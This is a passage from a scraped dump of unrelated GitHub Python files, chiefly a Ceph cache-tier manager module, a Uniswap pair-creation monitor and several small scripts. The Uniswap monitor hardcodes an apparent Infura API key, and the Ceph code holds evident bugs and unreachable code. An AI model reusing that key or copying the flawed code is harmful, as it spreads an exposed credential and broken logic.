location = self.geolocator.reverse(loc).address.encode('utf-8')\n location = textwrap.wrap(location, width=38)\n for location_line in location:\n elems = (latlon,location_line)\n # only print this on first line\n latlon = ''\n ret += self.get_pretty_row(elems, 80) + '\\n'\n ret += self.get_pretty_footer(80)\n\n return (0, '', ret)\n\n # return 3-tuple result code, output buffer, informative string\n def _cmd_cache_add_crush(self,inbuf,cmd):\n\n # check if already set before fetching data from cluster\n stored_pools = self.fetch('cache_assoc')\n\n if cmd['pool_name'] in stored_pools:\n if cmd['crush_rule'] in stored_pools[cmd['pool_name']]:\n return (0,\"\",\"Association of {} with crush root {} already set\".format(cmd['pool_name'],cmd['crush_rule']))\n\n # tree = self.get('osd_map_tree')\n osdmap = self.get_osdmap()\n crushmap = 
osdmap.get_crush().dump()\n\n for pool_id, pool in osdmap.get_pools().items():\n if pool['pool_name'] == cmd['pool_name']:\n # pool exists\n for rule in crushmap['rules']:\n if rule['rule_name'] == cmd['crush_rule']:\n stored_pools.setdefault(cmd['pool_name'],[]).append(cmd['crush_rule'])\n self.set_store('cache_assoc', json.dumps(stored_pools))\n return (0,\"\",\"Associated {} with crush rule {} for cache overlays\".format(cmd['pool_name'],cmd['crush_rule']))\n return (-errno.EINVAL, \"\", \"Pool or crush rule does not exist\")\n\n def _cmd_cache_remove_crush(self,inbuf,cmd):\n stored_pools = self.fetch('cache_assoc')\n if cmd['pool_name'] in stored_pools:\n if cmd['crush_rule'] in stored_pools[cmd['pool_name']]:\n stored_pools[cmd['pool_name']].remove(cmd['crush_rule'])\n self.store('cache_assoc', stored_pools)\n return (0,\"\",\"Association of {} with crush root {} removed\".format(cmd['pool_name'],cmd['crush_rule']))\n\n\n def _cmd_cache_add_location(self,inbuf,cmd):\n stored_loc = self.fetch('loc_assoc')\n\n location_geocode = self.geolocator.geocode(cmd['location'])\n\n if location_geocode == None:\n return self.hande_err('geocode', location=cmd['location'])\n\n if 'proximity' in cmd:\n setprox = cmd['proximity']\n else:\n setprox = self.proximity\n\n if cmd['crush_rule'] in stored_loc:\n for lat,lon,prox in stored_loc[cmd['crush_rule']]:\n if location_geocode.latitude == lat and location_geocode.longitude == lon:\n if prox == setprox:\n return(0,\"\", \"Location {},{} with proximity {} miles already associated with crush root {} (argument provided as {})\"\n .format(location_geocode.latitude, location_geocode.longitude, prox, cmd['crush_rule'], cmd['location']))\n else:\n stored_loc[cmd['crush_rule']].remove([lat,lon,prox])\n stored_loc[cmd['crush_rule']].append([lat,lon,setprox])\n self.store('loc_assoc', stored_loc)\n return(0,\"\",\"Location already associated - updated location proximity to {} miles\".format(setprox))\n\n osdmap = self.get_osdmap()\n crushmap = osdmap.get_crush().dump()\n\n for rule in crushmap['rules']:\n self.log.info(\"_cmd_cache_associate_location: crush rule {} being compared to user specified rule\".format(rule['rule_name']))\n # make sure it exists\n if rule['rule_name'] == cmd['crush_rule']:\n stored_loc[cmd['crush_rule']] = [[location_geocode.latitude, location_geocode.longitude, setprox]]\n self.store('loc_assoc', stored_loc)\n return (0,\"\", \"Location {},{} now associated with crush rule\") \n \n # {}\".format(location_geocode.latitude, location_geocode.longitude, rule['rule_name']))\n\n return (-errno.EINVAL, '', \"Crush rule {} not found\".format(cmd['crush_rule'])) \n\n def _cmd_cache_enable(self,inbuf,cmd):\n # verify there is a location association\n stored_loc = self.fetch('loc_assoc')\n if cmd['crush_rule'] in stored_loc:\n stored_enable = self.fetch('loc_enable')\n stored_enable[cmd['crush_rule']] = cmd['enable']\n self.store('loc_enable', stored_enable)\n return(0,\"\",\"Enabled cache creation for crush root {}\".format(cmd['crush_rule']))\n return(-errno.EINVAL, '',\"Crush root {} not found\".format(cmd['crush_rule'])) \n\n # set overide in datastore, will be picked up by traffic poller and applied\n def _cmd_cache_simulate_location(self,inbuf,cmd):\n return self.cache_simulate_location(cmd['location'], enable=True)\n\n def _cmd_cache_no_simulate_location(self,inbuf,cmd):\n return self.cache_simulate_location(cmd['location'], enable=False)\n\n # set overide in datastore, will be picked up by traffic poller and applied\n def 
cache_simulate_location(self,location, enable=True):\n stored_override = self.fetch('loc_override', default = 'list')\n\n location_geocode = self.geolocator.geocode(location)\n if location_geocode == None:\n return self.hande_err('geocode', location=location)\n\n if enable == True:\n if [location_geocode.latitude, location_geocode.longitude] not in stored_override:\n stored_override.append([location_geocode.latitude, location_geocode.longitude])\n rmsg = \"Simulating high traffic threshold for\"\n elif [location_geocode.latitude, location_geocode.longitude] in stored_override:\n stored_override.remove([location_geocode.latitude, location_geocode.longitude])\n rmsg = \"Stopped simulating traffic for\"\n else:\n return(-errno.EINVAL, '', 'Location not found in simulated locations')\n\n self.store('loc_override',stored_override)\n\n return (0, \"\", \"{} {},{} ({})\".format(rmsg,location_geocode.latitude, location_geocode.latitude, location_geocode.address.encode('utf-8')))\n\n def err_s(self, msg, pool=None,state=None,location=None):\n errmap = dict()\n errmap['geocode'] = (-errno.EINVAL, \"\", \"Location {} not found by geocode lookup\".format(location))\n errmap['poolstate'] = \"Setting cache pool {} state {} failed\".format(pool, state)\n\n return errmap[msg]\n \n def poll_traffic(self):\n \n self.log.info(\"Polling traffic\")\n\n #stored_loc\n # crush -> location list (lat,lon,prox) tuples\n\n # stored_pools\n # pools -> crush rule list\n\n #stored_loc = self.fetch('loc_assoc')\n # stored_assoc = self.fetch('cache_assoc')\n stored_loc = self.fetch('loc_assoc')\n stored_override = self.fetch('loc_override', default ='list')\n stored_active = self.fetch('cache_active')\n stored_pools = self.fetch('cache_assoc')\n\n self.log.info(\"poll_traffic: Retrieved stored cache status: {}\".format(stored_active))\n\n # we only care about crush rules that have pool associations\n\n for pool in stored_pools:\n for crush in stored_pools[pool]:\n self.log.info(\"poll_traffic: pool {}: associated cache crush rule {} being checked for any location association \".format(pool, crush))\n if crush in stored_loc:\n for loclist in stored_loc[crush]:\n lat = loclist[0]\n lon = loclist[1]\n prox = loclist[2]\n self.log.info(\"poll_traffic: pool {}: cache crush rule {} has association with location {},{} \".format(pool, crush, lat,lon))\n\n # pseudo code block for doing this with actual network data\n # query: traffic to OSD which are included in a crush rule associated with a location proximity\n # filter: sum of all traffic by location exceeding threshold\n # if location exceeds configured threshold add coordinates to network_locations list\n # combine that list with user over-ride locations \n # iterate through list and trigger cache startup state if a crush rule -> location association exists within proximity\n # any crush rule -> location associations not in list need to be marked as teardown if past timeout\n\n # ... 
but right now there is no real network data to include\n network_locations = []\n trigger_locations = stored_override + network_locations\n\n # mark active caches for teardown if cooldown exceeded (will be over-ridden by location trigger check)\n if crush in stored_active:\n for cache_info in stored_active[crush]:\n if cache_info['state'] == 'active' and (time.time() - cache_info['timestamp'] > self.cooldown):\n self.log.info(\"poll_trafic: cache pool {}: cooldown expired, marking for teardown\".format(cache_info['cache_pool']))\n cache_info['state'] = 'teardown'\n\n\n # check list of trigger locations and activate new caches if necessary\n for location in trigger_locations:\n distance = geodesic((lat,lon), location)\n\n # is the overide location within specified proximity to any stored location/crush association?\n if distance <= prox:\n self.log.info(\"poll_traffic: location {},{} triggered cache activation for pool {} using crush rule {}\".format(lat,lon, pool, crush))\n if crush in stored_active:\n for cache_info in stored_active[crush]:\n if cache_info['state'] == 'active':\n self.log.info(\"poll_traffic: Pool {} is already active\".format(cache_info['cache_pool']))\n # reset timestamp used for cooldown \n cache_info['timestamp'] = time.time()\n continue\n else:\n self.log.info(\"poll_traffic: Pool {} changed from state {} to state {}\".format(cache_info['cache_pool'], cache_info['state'], 'startup'))\n cache_info['timestamp'] = time.time()\n cache_info['state'] = 'startup'\n else:\n self.log.info(\"poll_traffic: Pool {} in crush {} added to stored status object with state 'startup'\".format(\"{}{}\".format(pool, self.suffix), crush))\n stored_active[crush] = [{'backing_pool': pool, 'cache_pool': \"{}{}\".format(pool, self.suffix) , 'state': 'startup', 'timestamp': time.time() }]\n\n # the only thing we change here is the cache active status\n self.log.info(\"poll_traffic: storing new changes to cache status\")\n self.store('cache_active', stored_active)\n\n def manage_cache(self):\n self.log.info(\"manage_cache: starting loop through status object\")\n \n stored_active = self.fetch('cache_active')\n\n for crush_rule in stored_active:\n self.log.info(\"Checking cache pools for rule {}\".format(crush_rule))\n for cache_info in stored_active[crush_rule]:\n # lindex = stored_active[crush_rule].index(cache_info)\n self.log.info(\"Pool {}: State is marked {}\".format(cache_info['cache_pool'],cache_info['state']))\n # cache is drained and ready for teardown\n if cache_info['state'] == 'empty':\n self.log.info(\"Pool {}: triggering removal\".format(cache_info['cache_pool']))\n\n if self.remove_cache(stored_active['cache_pool'], stored_active['backing_pool']):\n stored_active[crush_rule].remove(cache_info)\n else:\n # pool was not empty, reset the process\n self.log.info(\"Pool {}: not empty, resetting state to draining\".format(cache_info['cache_pool']))\n cache_info['state'] = 'draining'\n \n # cache is marked draining - check if empty\n if cache_info['state'] == 'draining':\n self.log.info(\"Pool {}: checking for drain thread active\".format(cache_info['cache_pool']))\n if cache_info['cache_pool'] in self.workers:\n thread = self.workers[cache_info['cache_pool']]\n if thread.is_alive():\n return\n else:\n self.log.info(\"Pool {}: drain thread complete, marking empty\".format(cache_info['cache_pool']))\n cache_info['state'] = 'empty'\n self.workers[cache_info['cache_pool']].remove()\n\n # no thread is working on draining it, set state back to 'teardown' and trigger flush again\n else:\n 
self.log.info(\"Pool {}: no thread is working on draining, resetting state to teardown\".format(cache_info['cache_pool']))\n cache_info['state'] = 'teardown'\n \n \n # cache is no longer required and should begin draining and teardown\n if cache_info['state'] == 'teardown': \n self.log.info(\"Pool {}: starting teardown/drain thread\".format(cache_info['cache_pool']))\n worker = Thread(target=self.flush_cache, args=(cache_info['cache_pool']))\n worker.setDaemon(True)\n worker.start()\n # wait for thread to initialize and begin flushing\n while worker.is_alive() and not self.event.wait():\n self.workers[cache_info['cache_pool']] = worker\n cache_info['state'] = 'draining'\n \n if cache_info['state'] != 'draining':\n self.log.error(self.err_s('poolstate', pool=cache_info['cache_pool'], state='draining'))\n\n # cache needs to started up\n if cache_info['state'] == 'startup':\n self.log.info(\"Pool {}: creating cache pool and setting state active\".format(cache_info['cache_pool']))\n # we may eventually need to incorporate options for min_size, max_size, etcs\n if self.create_cache(cache_pool=cache_info['cache_pool'], backing_pool=cache_info['backing_pool'], crush_rule=crush_rule):\n cache_info['state'] = 'active'\n else:\n self.log.error(self.err_s('poolstate', pool=cache_info['cache_pool'], state='active'))\n\n # stored_active[crush_rule][lindex] = cache_info\n\n # stored_active.setdefault(crush_rule, ()).append({'backing_pool': backing_pool, 'cache_pool': cache_pool, 'state': 'active' })\n self.log.info(\"Storing current cache_active status {}\".format(stored_active))\n self.store('cache_active', stored_active)\n\n # at this point I'm not quite sure how to check if a cache pool is actually \n # configured as an overlay so the best we can do is check that it exists \n # if ecprofile is provided then the pool type argument automatically changes to erasure\n # if pg_num is not provided the module global default setting is used\n def create_cache(self,cache_pool,backing_pool,crush_rule, pg_num=None,ecprofile=None, size=None, min_size=None, max_bytes=None, max_objects=None):\n self.log.info(\"create_cache: pool: {}, cache: {}, crush: {}\".format(backing_pool,cache_pool, crush_rule))\n\n if size == None:\n size = self.get_module_option('size')\n\n if min_size == None:\n min_size = self.get_module_option('min_size')\n\n if pg_num == None:\n pg_num = self.get_module_option('pg_num')\n\n if max_bytes == None:\n max_bytes = self.get_module_option('default_cache_size')\n\n if max_objects == None:\n max_objects = self.get_module_option('default_cache_objects')\n\n writeback = 'writeback'\n\n pool_cmd = { \"prefix\": \"osd pool create\",\n \"pool\": cache_pool,\n \"pg_num\": pg_num,\n \"pgp_num\": pg_num,\n \"pool_type\": 'replicated',\n \"rule\": crush_rule,\n \"size\": size\n }\n\n if ecprofile:\n pool_cmd['erasure_code_profile'] = ecprofile\n pool_cmd['pool_type'] = 'erasure'\n\n pool_min_size = {\n \"prefix\": \"osd pool set\",\n \"pool\": cache_pool,\n \"var\": \"min_size\",\n \"val\": str(min_size)\n }\n\n tier_add = { \n \"prefix\": \"osd tier add\",\n \"pool\" : backing_pool,\n \"tierpool\": cache_pool\n }\n\n cache_mode = {\n \"prefix\": \"osd tier cache-mode\",\n \"pool\": cache_pool,\n \"mode\": writeback,\n }\n\n set_overlay = {\n \"prefix\": \"osd tier set-overlay\",\n \"pool\": backing_pool,\n \"overlaypool\": cache_pool\n }\n\n hit_set = {\n \"prefix\": \"osd pool set\",\n \"pool\": cache_pool,\n \"var\": \"hit_set_type\",\n \"val\": \"bloom\"\n }\n\n max_bytes_cmd = {\n \"prefix\": \"osd 
pool set\",\n \"pool\": cache_pool,\n \"var\": \"target_max_bytes\",\n \"val\": str(max_bytes)\n }\n\n run_cmds = (pool_cmd, pool_min_size, tier_add, cache_mode, set_overlay, hit_set, max_bytes_cmd)\n\n if max_objects > 0:\n max_objects_cmd = {\n \"prefix\": \"osd pool set\",\n \"pool\": cache_pool,\n \"var\": \"target_max_objects\",\n \"val\": str(max_objects)\n }\n\n run_cmds.append(max_objects_cmd)\n\n rcode = 0\n i = 0\n while rcode == 0 and i < len(run_cmds):\n self.log.info(\"Running command: {}\".format(run_cmds[i]))\n rcode, stdout, errstr = self.mon_command(run_cmds[i])\n i += 1\n\n if rcode != 0:\n self.log.error(\"Pool creation failed for cache pool {}: {}\".format(cache_pool, errstr))\n return False\n\n return True\n\n # run in background thread to flush cache\n def flush_cache(self,pool_name):\n self.log.info(\"flush_cache: pool {}\".format(pool_name))\n return \n\n rcode, stdout, errstr = self.mon_command({\n \"prefix\": \"osd tier cache-mode\",\n \"pool\": pool_name,\n \"mode\": \"forward\",\n \"yes_i_really_mean_it\": True\n })\n if rcode != 0:\n self.log.error(\"Error setting {} to cache-mode forward for flushing: {}\".format(pool_name, errstr))\n return False\n \n self.event.set()\n\n # wait for flush to finish\n rcode = subprocess.call(['rados', '-p', pool_name, 'cache-flush-evict-all'])\n if rcode != 0: \n self.log.error(\"Cache flush evict all failed for pool {}\".format(pool_name))\n return False\n\n return\n\n def remove_cache(self,cache_pool, backing_pool):\n self.log.info(\"remove_cache: backing pool {}, cache pool {}\".format(backing_pool, cache_pool))\n return \n\n # verify really empty\n try:\n pool_contents = subprocess.check_output(['rados', '-p', cache_pool, 'ls'])\n except CalledProcessError as cpe:\n self.log.error(\"remove_cache: pool {} error checking contents {}: {}\".format(cache_pool,cpe.returncode, cpe.output))\n return False\n if len(pool_contents) > 0:\n self.log.error(\"remove_cache: pool {} is not empty, not removing cache\".format(pool_name))\n return False\n\n rcode, stdout, errstr = self.mon_command({\n \"prefix\": \"osd tier rm-overlay\",\n \"pool\": backing_pool\n })\n\n if rcode != 0:\n self.log.error(\"Error removing cache overlay from pool {}: {}\".format(backing_pool, errstr))\n return False\n\n rcode, stdout, errstr = self.mon_command({\n \"prefix\": \"osd tier remove\",\n \"pool\": backing_pool,\n \"tierpool\": cache_pool\n })\n\n if rcode != 0:\n self.log.error(\"Error removing cache tier {} from pool {}: {}\".format(cache_pool, backing_pool, errstr))\n return False\n\n self.log.info(\"Removed cache tier {} from pool {}\".format(cache_pool, backing_pool))\n return True\n\n # fetch json dicts or lists from datastore or initialize for use if not yet stored\n def fetch(self,storekey, default = 'dict'):\n stored = self.get_store(storekey)\n if stored == None:\n if default == 'list':\n stored = list() \n elif default == 'dict':\n stored = dict()\n else:\n stored = json.loads(stored)\n\n return stored\n\n # store dict into datastore \n def store(self,storekey,data):\n self.set_store(storekey, json.dumps(data))\n\n#\n#\n#\n# cr_name = crush.get_rule_by_id(pool['crush_rule'])['rule_name']\n# root_id = int(crush.get_rule_root(cr_name))\n# pool_root[pool_id] = root_id\n\n # { poolid: {pool keys} }\n # self.log.error(\"HERE IS AN OSDMAP EXAMPLE: \\n\\n {}\".format(osdmap))\n \n #self.log.error(\"HERE IS A CRUSHMAP EXAMPLE: \\n\\n {}\".format(crushmap))\n\n # crush_exists = crushmap.get_item_name(cmd['crush_rule'])\n #self.log.info('Crush 
received: {}'.format(cmd['crush_rule']))\n # self.log.info('Crush looked up: {}'.format(crush_exists))\n \n # self.log.info('Crush name: {}'.format(crush_exists))\n #cmd['crush_rule']\n #cmd['pool_name']\n\n\n","repo_name":"MI-OSiRIS/ceph-mgr-cachetier","sub_path":"module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":32445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72887949254","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n list = []\n output = ''\n x = str(x)\n\n for i in range(len(x)):\n list.append(x[i])\n\n for j in range(len(x)):\n output = output + list.pop() \n\n if output == x:\n return True\n else:\n return False\n","repo_name":"aulee888/LeetCode","sub_path":"Palindrome Number.py","file_name":"Palindrome Number.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31921278864","text":"import json\nfrom web3 import Web3\nimport pymongo\nimport datetime\nfrom threading import Thread, Timer\nimport logging\nimport sys\nimport time\nfrom monitor.known_addresses import KNOWN_ADDRESSES\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\nlogger = logging.getLogger(__name__)\nhandler = logging.FileHandler(f\"logs/{__name__}_log.log\")\nformatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(funcName)s : %(message)s')\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\ndb_client = pymongo.MongoClient(os.getenv('MONGODB_INSTANCE'))\nscam_db = db_client[\"eth-scam-checker\"]\npairs_collection = scam_db[\"pairs\"]\n\nmy_provider = \"https://mainnet.infura.io/v3/002262bebeb24a3093c043587f48c428\"\nrouter_address = Web3.toChecksumAddress(\"0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D\")\nfactory_address = Web3.toChecksumAddress(\"0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f\")\n\nclient = Web3(Web3.HTTPProvider(my_provider))\n\nwith open(\"abi/IUniswapV2Factory.json\") as f:\n uniswap_factory = json.load(f)\n\nuniswap_factory_abi = uniswap_factory[\"abi\"]\ncontract = client.eth.contract(address=factory_address, abi=uniswap_factory_abi)\n\n\n# with open(\"abi/ERC20.json\") as f:\n# erc20_abi = json.load(f)\n\n\nclass UniswapMonitor(Thread):\n def __init__(self, thread_id, name, queue, wait_time):\n Thread.__init__(self)\n self.threadID = thread_id\n self.name = name\n self.wait_time = wait_time\n self.queue = queue\n\n def run(self):\n logger.info(\"Starting \" + self.name + \" with wait time: \" + str(self.wait_time))\n event_filter = contract.events.PairCreated.createFilter(fromBlock='latest')\n\n while True:\n try:\n for PairCreated in event_filter.get_new_entries():\n t = Timer(self.wait_time, self.handle_event, args=(PairCreated,))\n logger.info(\"Thread waiting to run handle event at: \" + str(datetime.datetime.utcnow()))\n t.start()\n # self.handle_event(PairCreated)\n\n except Exception as e:\n logger.critical(\"Infura PairCreated event failed, recreating eventfilter\", exc_info=True)\n try:\n event_filter = contract.events.PairCreated.createFilter(fromBlock='latest')\n\n except:\n logger.warning(\"Could not recreate eventfilter yet\")\n\n finally:\n time.sleep(30)\n\n def handle_event(self, event):\n try:\n json_object = json.loads(Web3.toJSON(event))\n token0_address = Web3.toChecksumAddress(json_object['args']['token0'])\n token1_address = Web3.toChecksumAddress(json_object['args']['token1'])\n\n pair = {\n \"pair_address\": 
Web3.toChecksumAddress(json_object['args']['pair']),\n \"token0\": token0_address,\n \"token1\": token1_address,\n \"blockNumber\": json_object['blockNumber'],\n \"create_time\": time.time()\n }\n pairs_collection.replace_one({\"pair_address\": Web3.toChecksumAddress(json_object['args']['pair'])}, pair,\n upsert=True)\n\n for token_address in [token0_address, token1_address]:\n if Web3.toChecksumAddress(token_address) not in KNOWN_ADDRESSES:\n self.queue.put(Web3.toChecksumAddress(token_address))\n\n except Exception as e:\n logger.error(\"Exception occurred\", exc_info=True)\n","repo_name":"smart-contract-check/smart-contract-check","sub_path":"monitor/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"70390747333","text":"import numpy as np\r\nimport cv2\r\nfrom pathlib import Path\r\n\r\ncaminhoImagem = Path('Anexos, Imagens e Videos/len_std.png')\r\n\r\n# Step 1 read in the picture\r\nimg = cv2.imread(str(caminhoImagem),0)\r\n\r\nimg_float = np.float32(img)\r\n\r\n# Step 3: Fourier transform with cv2.dft\r\ndft = cv2.dft(img_float, flags=cv2.DFT_COMPLEX_OUTPUT)\r\n\r\n# Step 4: use np.fft.fftshift to transfer the low frequency to the image center\r\ndft_center = np.fft.fftshift(dft)\r\n\r\n# Step 5: define mask: the generated mask is 1 in the middle and 0 around\r\ncrow, ccol = int(img.shape[0] / 2), int(img.shape[1] / 2) # Find the center of the image\r\nmask = np.zeros((img.shape[0], img.shape[1], 2), np.uint8)\r\nmask[crow-30:crow+30, ccol-30:ccol+30] = 1\r\n\r\n# Step 6: multiply the mask with the image after Fourier transform, and keep the middle part\r\nmask_img = dft_center * mask\r\n\r\n# Step 7: use np.fft.ifftshift() to move the low frequency to the original position\r\nimg_idf = np.fft.ifftshift(mask_img)\r\n\r\n# Step 8: inverse Fourier transform using cv2.idft\r\nimg_idf = cv2.idft(img_idf)\r\n\r\n# Step 9: use cv2.magnitude to convert into space domain\r\nimg_idf = cv2.magnitude(img_idf[:, :, 0], img_idf[:, :, 1])\r\n\r\n# Converte a matrix novamente para o tipo unsigned 8bits e ajusta a escala dos pixels\r\ncv2.normalize(img_idf, img_idf, 0, 1, cv2.NORM_MINMAX)\r\n\r\ncv2.imshow('Input Image',img)\r\ncv2.imshow('Ringed Image',img_idf)\r\n\r\ncv2.waitKey(0)","repo_name":"cegoes/TEC434_Pratica_OpenCV_Python","sub_path":"07.05 DFT Passa Baixa/DFT_Passa_Baixa.py","file_name":"DFT_Passa_Baixa.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"34745421093","text":"import subprocess\nimport os\n\ndef check_for_packages(package):\n cmd = (package+\" --version\" or package+\" -v\").split(\" \")\n sp = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n rc = sp.wait()\n if(rc==1):\n print(\">> you have to install {}\".format(cmd[0]))\n os.system(\"pause\")\n else:\n print(\">> {} already exist in your machine\".format(cmd[0]))\n\ncheck_for_packages(\"node\")","repo_name":"Mohan20001/GetIP","sub_path":"download_pkg.py","file_name":"download_pkg.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15108076772","text":"__author__ = 'Lola'\n\nfrom crawler import Crawler\nfrom pageRank import pageRank\n\n#seeds\nurl_list = 
['http://people.f4.htw-berlin.de/fileadmin/user_upload/Dozenten/WI-Dozenten/Classen/DAWeb/smdocs/d01.html']\nurl_list.append('http://people.f4.htw-berlin.de/fileadmin/user_upload/Dozenten/WI-Dozenten/Classen/DAWeb/smdocs/d06.html')\nurl_list.append('http://people.f4.htw-berlin.de/fileadmin/user_upload/Dozenten/WI-Dozenten/Classen/DAWeb/smdocs/d08.html')\n\ncrawl = Crawler(url_list)\n\ndef activate_crawl():\n\n if crawl.crawl_complete:\n print('website crawl complete')\n\n else:\n crawl.downloader()\n crawl.parser()\n crawl.frontier()\n\n #crawl feedback\n print('link temporary:\\t\\t', sorted(crawl.link_temporary))\n print('link set:\\t\\t\\t', sorted(crawl.link_set))\n print('page_rank_graph:\\t', crawl.page_rank_graph)\n print('not crawled:\\t\\t',crawl.url_seed)\n print('NEW RUN ++++++++++++++++++++++++++++++++++++++')\n\n activate_crawl()\n\nactivate_crawl()\n\npage_rank = pageRank(crawl.page_rank_graph)\nprint(page_rank.returnGraph())\nprint('number_of_sites:\\t\\t', page_rank.calc_number_of_sites())","repo_name":"CharlotteBolinski/CMS","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12211153728","text":"\"\"\"\nOrganism object\nIt allocates the full data structure\n\"\"\"\n\nimport random\nimport numpy as np\nfrom scipy.stats import ks_2samp\nimport copy\n\ndef gini_RSV(values_for_each_class):\n '''\n Gini coefficient, modified in order to be able to deal with negative\n values as in \"Inequality measures and the issue of negative incomes\"\n (Raffinetti, Siletti, Vernizzi)\n\n Parameters\n ----------\n values_for_each_class : array-like object\n Values associated to each class.\n They don't need to be already sorted and/or normalized.\n They can also be negative.\n\n Returns\n -------\n giniRSV : float\n Ranges from 0 (perfect equality) to 1 (maximal inequality).\n\n '''\n \n N = len(values_for_each_class)\n \n numerator = 0\n for i in values_for_each_class:\n for j in values_for_each_class:\n numerator += abs(i - j)\n \n pos = 0 # sum over the positive values\n neg = 0 # sum over the negative values (in absolute value)\n for x in values_for_each_class:\n if x >= 0:\n pos += x\n else:\n neg += -x\n \n mu_RSV = (N - 1) * (pos + neg) / N**2 # modified mu parameter\n \n if mu_RSV == 0:\n # Manage two special cases (avoiding 0-division error):\n # - when a single value is the input\n # - when all the values in the input are 0\n # In both cases mu_RSV will be 0\n # No inequality is measurable, and therefore 0 is returned\n return 0\n denominator = 2 * N**2 * mu_RSV\n giniRSV = numerator / denominator\n \n return giniRSV\n\n\nclass OrganismObject:\n \"\"\"Organism object\n The Organism object essentially contains two vectors:\n - A vector of connector objects\n - A vector of recognizer objects\n The order of the elements in these vectors determine, implicitly,\n the connections between the elements (i.e. 
what recognizers a\n particular connector is connecting)\n \"\"\"\n\n def __init__(self, _id: int, conf: dict, max_pssm_length: int) -> None:\n \"\"\"Organism constructor\n\n Args:\n _id: Organism identifier (assigned by factory)\n conf: Organism-specific configuration values from JSON file\n self.pwm_length: Maximum column size of the pssm recognizer\n\t [will prevent mutations from going over max pssm length]\n \"\"\"\n self._id = _id\n \n # Instantiate recognizer and connector vectors\n self.recognizers = []\n self.connectors = []\n\t\n # assign organism-specific parameters\n\t\n # whether fitness is computed over sequences as sum or average\n self.cumulative_fit_method = conf[\"CUMULATIVE_FIT_METHOD\"]\n \n # energy thresholding parameters (to prevent negative energy values)\n self.energy_threshold_method = conf[\"ENERGY_THRESHOLD_METHOD\"]\n self.energy_threshold_value = conf[\"ENERGY_THRESHOLD_PARAM\"]\n \n # probability of replacing PSSM by random PSSM\n self.mutate_probability_substitute_pssm = conf[\n \"MUTATE_PROBABILITY_SUBSTITUTE_PSSM\"\n ]\n \n # type of indel operator: \n # - blind (preserves connectors)\n # - intelligent (merges connectors) \n self.insertion_method = conf[\n \"INSERTION_METHOD\"\n ]\n self.deletion_method = conf[\n \"DELETION_METHOD\"\n ]\n\t\n #probability of deleting/inserting a recognizer\n self.mutate_probability_delete_recognizer = conf[\n \"MUTATE_PROBABILITY_DELETE_RECOGNIZER\"\n ]\n self.mutate_probability_insert_recognizer = conf[\n \"MUTATE_PROBABILITY_INSERT_RECOGNIZER\"\n ]\n\t\n # probability of mutating a node\n self.mutate_probability_node_mutation = conf[\n \"MUTATE_PROBABILITY_NODE_MUTATION\"\n ]\n\t\n # min and maximum number of nodes allowed\n self.min_nodes = conf[\"MIN_NODES\"]\n self.max_nodes = conf[\"MAX_NODES\"]\n\t\n # maximum length of PSSMs allowed\n self.max_pssm_length = max_pssm_length\n \n # Map used by the placement algorithm\n # The list maps each row of the matrix of the placement scores onto a\n # column of a PSSM: each row is assigned a [pssm_idx, column_idx]\n self.row_to_pssm = []\n \n \n def set_row_to_pssm(self):\n \"\"\"row_to_pssm is an attribute that maps each row of the alignment\n matrix to the index (within org) of the pssm recognizer, and the\n column of the pssm that applies to that row.\n In the alignment matrix, the rows correspond all consecutively to \n pssm positions (i.e. 
columns).\n This attribute allows to go from row directly to a pair of indices\n denoting the pssm number and the position within the pssm that maps\n to it.\n \n Call by factory upon generation of organism, and also after any\n mutations that might change the size of the pssm, or the column order,\n or their number.\n \"\"\"\n \n pssm_list = self.recognizers\n \n # Initialize list\n # (first row in the placement matrix doesn't represent any PSSM position)\n row_to_pssm_list = [[None, None]]\n \n # Fill the list\n for i in range(len(pssm_list)):\n for j in range(pssm_list[i].length):\n row_to_pssm_list.append([i, j])\n \n # Token row\n # (this ensures that the last row will be considered the row of the last\n # position of a PSSM when calling self.is_last() on it)\n row_to_pssm_list.append([None, 0])\n \n self.row_to_pssm = row_to_pssm_list\n\n def get_id(self) -> int:\n \"\"\"Getter _id\n\n Returns:\n _id of the organism\n \"\"\"\n return self._id\n\n def set_id(self, _id: int) -> None:\n \"\"\"Setter _id\n\n Args:\n _id: ID to to set in the organism\n \"\"\"\n self._id = _id\n \n def mutate(self, org_factory) -> None:\n \"\"\"Mutates an organism based on JSON configured probabilities\n\n Args:\n org_factory (OrganismFactory): Factory of organisms and node\n components\n \"\"\"\n\n \n # Delete a recognizer (and one parent connector)\n if random.random() < self.mutate_probability_delete_recognizer:\n \n n_recognizers = self.count_recognizers()\n # if this is a single-node organism, skip deletion\n if n_recognizers != 1:\n \t\t\t# \"blind\" method: the remaining connector is left unchanged\n if self.deletion_method == \"blind\":\n # Choose randomly the recognizer to be deleted\n recognizer_idx = random.randint(0, n_recognizers - 1)\n if recognizer_idx == 0:\n # If the recognizer to delete is the first, the connector to\n # delete is the one to the right\n # ( same index: connector_idx = recognizer_idx = 0 )\n connector_idx = recognizer_idx\n elif recognizer_idx == n_recognizers - 1:\n # If the recognizer to delete is the last, the connector to\n # delete is the one to the left\n # ( different index: connector_idx = recognizer_idx - 1 )\n connector_idx = recognizer_idx - 1\n else:\n # if the recognizer to delete is in not a terminal recognizer\n # of the chain, the parent connector to be deleted (left/riht)\n # is chosen randomly\n if random.random() < 0.5:\n 